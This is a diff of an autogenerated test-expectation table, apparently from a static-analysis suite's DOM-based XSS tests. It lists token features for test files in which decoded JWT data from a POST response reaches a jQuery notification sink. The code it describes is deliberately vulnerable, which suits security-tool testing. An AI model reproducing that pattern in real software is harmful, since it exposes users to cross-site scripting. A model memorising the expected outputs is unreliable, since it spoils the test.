+| autogenerated/Xss/DomBasedXss/jwt.js:1:24:1:35 | "jwt-decode" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:24:1:35 | "jwt-decode" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:1:24:1:35 | "jwt-decode" | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:2:1:2:22 | import ... jquery" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:1:2:22 | import ... jquery" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:1:2:22 | import ... jquery" | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:2:8:2:8 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:8:2:8 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:8:2:8 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:8:2:8 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:8:2:8 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:8:2:8 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:8:2:8 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:8:2:8 | $ | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:2:8:2:8 | $ | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:2:8:2:8 | $ | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:2:15:2:22 | "jquery" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:15:2:22 | "jquery" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:2:15:2:22 | "jquery" | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:4:1 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:4:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:4:1 | $ | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:4:6 | $.post | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:4:6 | $.post | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:4:6 | $.post | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:7:2 | $.post( ... NCY]\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:7:2 | $.post( ... NCY]\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:7:2 | $.post( ... NCY]\\n}) | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:7:2 | exceptional return of $.post( ... NCY]\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:7:2 | exceptional return of $.post( ... NCY]\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:1:7:2 | exceptional return of $.post( ... NCY]\\n}) | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:3:4:6 | post | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:3:4:6 | post | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:3:4:6 | post | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:8:4:15 | loginUrl | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:8:4:15 | loginUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:8:4:15 | loginUrl | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:8:4:17 | exceptional return of loginUrl() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:8:4:17 | exceptional return of loginUrl() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:8:4:17 | exceptional return of loginUrl() | fileImports | jquery jwt-decode | | autogenerated/Xss/DomBasedXss/jwt.js:4:8:4:17 | loginUrl() | CalleeFlexibleAccessPath | $.post | | autogenerated/Xss/DomBasedXss/jwt.js:4:8:4:17 | loginUrl() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jwt.js:4:8:4:17 | loginUrl() | calleeImports | jquery | @@ -14232,6 +103770,15 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt.js:4:20:4:32 | {data: "foo"} | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/jwt.js:4:20:4:32 | {data: "foo"} | fileImports | jquery jwt-decode | | autogenerated/Xss/DomBasedXss/jwt.js:4:20:4:32 | {data: "foo"} | receiverName | $ | +| autogenerated/Xss/DomBasedXss/jwt.js:4:21:4:24 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:21:4:24 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:21:4:24 | data | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:21:4:31 | data: "foo" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:21:4:31 | data: "foo" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:21:4:31 | data: "foo" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:21:4:31 | data: "foo" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:21:4:31 | data: "foo" | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:21:4:31 | data: "foo" | fileImports | jquery jwt-decode | | autogenerated/Xss/DomBasedXss/jwt.js:4:27:4:31 | "foo" | CalleeFlexibleAccessPath | $.post | | autogenerated/Xss/DomBasedXss/jwt.js:4:27:4:31 | "foo" | InputAccessPathFromCallee | 1.data | | autogenerated/Xss/DomBasedXss/jwt.js:4:27:4:31 | "foo" | InputArgumentIndex | 1 | @@ -14240,6 +103787,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt.js:4:27:4:31 | "foo" | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/jwt.js:4:27:4:31 | "foo" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/jwt.js:4:27:4:31 | "foo" | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:4:34 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:4:34 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:4:34 | $ | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:4:34 | $ | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:4:34 | $ | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:4:34 | jwt_decode | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:4:34 | jwt_decode | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:4:34 | jwt_decode | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:4:34 | jwt_decode | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:4:34 | jwt_decode | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | 'arguments' object of anonymous function | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | 'arguments' object of anonymous function | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | 'arguments' object of anonymous function | fileImports | jquery jwt-decode | | autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | (data, ... ENCY]\\n} | CalleeFlexibleAccessPath | $.post | | autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | (data, ... ENCY]\\n} | InputArgumentIndex | 2 | | autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | (data, ... ENCY]\\n} | calleeImports | jquery | @@ -14247,6 +103809,61 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | (data, ... ENCY]\\n} | contextSurroundingFunctionParameters | (data, xhr) | | autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | (data, ... ENCY]\\n} | fileImports | jquery jwt-decode | | autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | (data, ... ENCY]\\n} | receiverName | $ | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | exceptional return of anonymous function | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | exceptional return of anonymous function | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | exceptional return of anonymous function | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | return of anonymous function | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | return of anonymous function | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:4:35:7:1 | return of anonymous function | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:36:4:39 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:36:4:39 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:36:4:39 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:36:4:39 | data | contextSurroundingFunctionParameters | (data, xhr) | +| autogenerated/Xss/DomBasedXss/jwt.js:4:36:4:39 | data | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:4:36:4:39 | data | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:4:36:4:39 | data | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:4:36:4:39 | data | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:4:36:4:39 | data | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:36:4:39 | data | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:4:42:4:44 | xhr | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:4:42:4:44 | xhr | contextSurroundingFunctionParameters | (data, xhr) | +| autogenerated/Xss/DomBasedXss/jwt.js:4:42:4:44 | xhr | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:4:42:4:44 | xhr | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:4:42:4:44 | xhr | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:15 | decoded | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:15 | decoded | contextSurroundingFunctionParameters | (data, xhr) | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:15 | decoded | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:15 | decoded | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:15 | decoded | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:34 | decoded | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:34 | decoded | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:34 | decoded | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:34 | decoded | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:34 | decoded | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:34 | decoded ... e(data) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:34 | decoded ... e(data) | contextSurroundingFunctionParameters | (data, xhr) | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:34 | decoded ... e(data) | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:34 | decoded ... e(data) | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:5:9:5:34 | decoded ... e(data) | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:28 | jwt_decode | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:28 | jwt_decode | contextSurroundingFunctionParameters | (data, xhr) | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:28 | jwt_decode | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:28 | jwt_decode | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:28 | jwt_decode | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:34 | exceptional return of jwt_decode(data) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:34 | exceptional return of jwt_decode(data) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:34 | exceptional return of jwt_decode(data) | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:34 | exceptional return of jwt_decode(data) | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:34 | exceptional return of jwt_decode(data) | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:34 | jwt_decode(data) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:34 | jwt_decode(data) | contextSurroundingFunctionParameters | (data, xhr) | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:34 | jwt_decode(data) | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:34 | jwt_decode(data) | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:5:19:5:34 | jwt_decode(data) | fileImports | jquery jwt-decode | | autogenerated/Xss/DomBasedXss/jwt.js:5:30:5:33 | data | CalleeFlexibleAccessPath | jwt_decode | | autogenerated/Xss/DomBasedXss/jwt.js:5:30:5:33 | data | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jwt.js:5:30:5:33 | data | calleeImports | jwt-decode | @@ -14255,6 +103872,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt.js:5:30:5:33 | data | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | | autogenerated/Xss/DomBasedXss/jwt.js:5:30:5:33 | data | enclosingFunctionName | $.post#functionalargument | | autogenerated/Xss/DomBasedXss/jwt.js:5:30:5:33 | data | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:5 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:5 | $ | contextSurroundingFunctionParameters | (data, xhr) | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:5 | $ | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:5 | $ | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:5 | $ | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:12 | $.jGrowl | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:12 | $.jGrowl | contextSurroundingFunctionParameters | (data, xhr) | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:12 | $.jGrowl | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:12 | $.jGrowl | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:12 | $.jGrowl | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:21 | $.jGrowl(decoded) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:21 | $.jGrowl(decoded) | contextSurroundingFunctionParameters | (data, xhr) | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:21 | $.jGrowl(decoded) | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:21 | $.jGrowl(decoded) | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:21 | $.jGrowl(decoded) | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:21 | exceptional return of $.jGrowl(decoded) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:21 | exceptional return of $.jGrowl(decoded) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:21 | exceptional return of $.jGrowl(decoded) | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:21 | exceptional return of $.jGrowl(decoded) | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:6:5:6:21 | exceptional return of $.jGrowl(decoded) | fileImports | jquery jwt-decode | +| autogenerated/Xss/DomBasedXss/jwt.js:6:7:6:12 | jGrowl | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt.js:6:7:6:12 | jGrowl | contextSurroundingFunctionParameters | (data, xhr) | +| autogenerated/Xss/DomBasedXss/jwt.js:6:7:6:12 | jGrowl | enclosingFunctionBody | data xhr decoded jwt_decode data $ jGrowl decoded | +| autogenerated/Xss/DomBasedXss/jwt.js:6:7:6:12 | jGrowl | enclosingFunctionName | $.post#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt.js:6:7:6:12 | jGrowl | fileImports | jquery jwt-decode | | autogenerated/Xss/DomBasedXss/jwt.js:6:14:6:20 | decoded | CalleeFlexibleAccessPath | $.jGrowl | | autogenerated/Xss/DomBasedXss/jwt.js:6:14:6:20 | decoded | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jwt.js:6:14:6:20 | decoded | calleeImports | jquery | @@ -14264,24 +103906,125 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt.js:6:14:6:20 | decoded | enclosingFunctionName | $.post#functionalargument | | autogenerated/Xss/DomBasedXss/jwt.js:6:14:6:20 | decoded | fileImports | jquery jwt-decode | | autogenerated/Xss/DomBasedXss/jwt.js:6:14:6:20 | decoded | receiverName | $ | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:0 | this | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:1 | backend | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:1 | backend | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:1 | backend | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:1 | nodemailer | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:1 | nodemailer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:1 | nodemailer | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:1:1:1 | require | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:5:1:14 | nodemailer | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:5:1:14 | nodemailer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:5:1:14 | nodemailer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:5:1:14 | nodemailer | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:5:1:38 | nodemai ... ailer') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:5:1:38 | nodemai ... ailer') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:5:1:38 | nodemai ... ailer') | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:5:1:38 | nodemailer | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:5:1:38 | nodemailer | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:5:1:38 | nodemailer | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:18:1:24 | require | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:18:1:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:18:1:24 | require | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:18:1:38 | exceptional return of require ... ailer') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:18:1:38 | exceptional return of require ... ailer') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:18:1:38 | exceptional return of require ... ailer') | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:18:1:38 | require ... ailer') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:18:1:38 | require ... ailer') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:1:18:1:38 | require ... ailer') | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:1:26:1:37 | 'nodemailer' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/DomBasedXss/nodemailer.js:1:26:1:37 | 'nodemailer' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/nodemailer.js:1:26:1:37 | 'nodemailer' | calleeImports | | | autogenerated/Xss/DomBasedXss/nodemailer.js:1:26:1:37 | 'nodemailer' | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/nodemailer.js:1:26:1:37 | 'nodemailer' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/nodemailer.js:1:26:1:37 | 'nodemailer' | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:5:2:11 | express | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:5:2:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:5:2:11 | express | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:5:2:32 | express | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:5:2:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:5:2:32 | express | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:5:2:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:5:2:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:5:2:32 | express ... press') | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:15:2:21 | require | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:15:2:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:15:2:21 | require | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:15:2:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:15:2:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:15:2:32 | exceptional return of require('express') | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:15:2:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:15:2:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:2:15:2:32 | require('express') | fileImports | ./backend express nodemailer | | autogenerated/Xss/DomBasedXss/nodemailer.js:2:23:2:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/DomBasedXss/nodemailer.js:2:23:2:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/nodemailer.js:2:23:2:31 | 'express' | calleeImports | | | autogenerated/Xss/DomBasedXss/nodemailer.js:2:23:2:31 | 'express' | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/nodemailer.js:2:23:2:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/nodemailer.js:2:23:2:31 | 'express' | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:5:3:7 | app | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:5:3:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:5:3:7 | app | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:5:3:19 | app | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:5:3:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:5:3:19 | app | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:5:3:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:5:3:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:5:3:19 | app = express() | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:11:3:17 | express | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:11:3:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:11:3:17 | express | fileImports | ./backend express nodemailer | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:11:3:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:11:3:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/nodemailer.js:3:11:3:19 | exceptional return of express() | fileImports | ./backend express 